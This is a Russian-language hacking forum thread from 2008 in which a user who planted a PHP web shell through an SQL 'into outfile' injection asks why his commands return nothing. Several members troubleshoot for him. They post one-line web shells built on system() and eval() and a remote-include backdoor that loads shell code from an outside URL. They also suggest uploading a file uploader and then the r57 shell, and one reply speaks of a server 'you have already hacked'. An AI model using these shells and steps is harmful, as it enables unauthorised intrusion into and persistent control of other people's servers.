проблема с шеллом !

Discussion in 'Песочница' started by stigmatus, 7 May 2008.

  1. stigmatus

    stigmatus New Member

    Joined:
    26 Apr 2008
    Messages:
    23
    Likes Received:
    4
    Reputations:
    -20
    загрузил шелл через " into outfile " простои типа :
    PHP:
     <? system($_GET['c']); ?> 
    но при виполнения любои команды типа "ls" ничего не случяется и результат никакои ! help !!
     
  2. fly

    fly Member

    Joined:
    15 Apr 2007
    Messages:
    584
    Likes Received:
    95
    Reputations:
    -10
    Сейф мод ON>?
    WinOs>?
    include заюзать>?
     
    #2 fly, 7 May 2008
    Last edited: 7 May 2008
  3. stigmatus

    stigmatus New Member

    Joined:
    26 Apr 2008
    Messages:
    23
    Likes Received:
    4
    Reputations:
    -20

    подскажи как ??? проверить Сейф мод ??
    include заюзать ???
     
  4. zythar

    zythar Elder - Старейшина

    Joined:
    16 Feb 2008
    Messages:
    517
    Likes Received:
    109
    Reputations:
    5
    пиши в РНР файле
    PHP:
    if (isset($_GET['shell'])) {
    include(
    $_GET['shell'];
    }
    потом юзай так:
    Code:
    http://site/script.php?shell=http://server/shell.txt
    
    юзай php.net
     
  5. Ali_MiX

    Ali_MiX Elder - Старейшина

    Joined:
    8 Oct 2006
    Messages:
    377
    Likes Received:
    67
    Reputations:
    -2
    а если так require_once(ROOT_DIR.'/shell.php');
     
    1 person likes this.
  6. stigmatus

    stigmatus New Member

    Joined:
    26 Apr 2008
    Messages:
    23
    Likes Received:
    4
    Reputations:
    -20
    ставид вот ето :
    получил ето :

     
  7. Don1=2

    Don1=2 Member

    Joined:
    10 Sep 2007
    Messages:
    0
    Likes Received:
    51
    Reputations:
    -19
    <? if (isset($_GET['shell'])) { include($_GET['shell']); } ?>
    скобочку забыл ... учи пхп
     
  8. zythar

    zythar Elder - Старейшина

    Joined:
    16 Feb 2008
    Messages:
    517
    Likes Received:
    109
    Reputations:
    5
    у тя скобки не хватает.
    Code:
    <? if (isset($_GET['shell'])) { include($_GET['shell'][B])[/B]; } ?>
    это если шелл на серваке который ты взломал уже.
     
  9. stigmatus

    stigmatus New Member

    Joined:
    26 Apr 2008
    Messages:
    23
    Likes Received:
    4
    Reputations:
    -20
    чё делоть ??? ищё может чтото ?
     
  10. _Pantera_

    _Pantera_ Характерне козацтво

    Joined:
    6 Oct 2006
    Messages:
    186
    Likes Received:
    356
    Reputations:
    109
    Ты уверен что он залился???? куда заливал - в /tmp или ты узнал путь от корня и нашел папку с правами на запись? Я склоняюсь к ответу что он просто не залился......
     
  11. stigmatus

    stigmatus New Member

    Joined:
    26 Apr 2008
    Messages:
    23
    Likes Received:
    4
    Reputations:
    -20
    ок но как обеснить ето : при выполнение пустои команды вот рез:
    есль можно по подробнее о том как залить его в /tmp а потом исполизовать !?
     
  12. Ali_MiX

    Ali_MiX Elder - Старейшина

    Joined:
    8 Oct 2006
    Messages:
    377
    Likes Received:
    67
    Reputations:
    -2
    ну так ёмаё замени shell на http://site.ru/shell.php и всё
     
  13. stigmatus

    stigmatus New Member

    Joined:
    26 Apr 2008
    Messages:
    23
    Likes Received:
    4
    Reputations:
    -20
    я английский знаю но при выполнение команды ls ничего не показивает !!
    как можно стартануть из /tmp шелл ???
     
  14. stigmatus

    stigmatus New Member

    Joined:
    26 Apr 2008
    Messages:
    23
    Likes Received:
    4
    Reputations:
    -20
    Ali_MiX !!! да я всё понял так и зделол и вот каким был результат !!
     
  15. l1ght

    l1ght Elder - Старейшина

    Joined:
    5 Dec 2006
    Messages:
    191
    Likes Received:
    678
    Reputations:
    333
    разумеется он залился смотри предыдущий пост
    раз урл-инклуд disabled я бы
    1)попытался залить шелл через приложения на сервере
    2)попробывал бы не через system()

    :add сорри забыл страницу обновить, но оба варианта актуальны)
     
    2 people like this.
  16. stigmatus

    stigmatus New Member

    Joined:
    26 Apr 2008
    Messages:
    23
    Likes Received:
    4
    Reputations:
    -20
    пожалуста по подробнее или силку где почитать можно !
     
  17. heks

    heks Banned

    Joined:
    24 Aug 2007
    Messages:
    713
    Likes Received:
    95
    Reputations:
    12
    да просто там запрещен инклуд файлов что то такое функция какая то отключена почитай на форуме много таких тем было
     
  18. Grey

    Grey Banned

    Joined:
    10 Jun 2006
    Messages:
    1,047
    Likes Received:
    1,315
    Reputations:
    1,159
    PHP:
    <?php phpinfo(); ?>
    получишь phpinfo() а внём уже найдешь информацию про сейф мод.

    или так:

    PHP:
    <?php eval($_GET['e']); ?>
    http://site/shell.php?e=phpinfo();

    Так сможешь выполнять php код.

    ====================================

    Не совсем понял что ты хотел сказать...
    Но инклудить вот так: include('http://site/shell.php'); нельзя, т.к. ЭТО во первых будет инклудом удалённого файла, а он у него запрещен (это видно из ошибки), а во вторых проинклудиться в таком случае не сам php код, а результат работы скрипта, а это разные вещи.

    ====================================

    Не 'что то такое', а там запрещен инклуд удалённых файлов (т.е. размещенных на другом сайте).

    ====================================

    to TC, если у тебя так плохо с пхп, то тебе будет проще залить через мускул (ты вроде написал что через него заливал) шелл побольше, что нидь с интерфейсом, или к примеру аплодилку файлов (код у неё не большой) и уже так перезалить что нидь типа r57.

    P.S. для вопросов есть, вообще то, специальная, прикреплённая тема.
    P.P.S. за советы типа Учи английский буду ставить минусы.
     
    #18 Grey, 7 May 2008
    Last edited: 7 May 2008
Loading...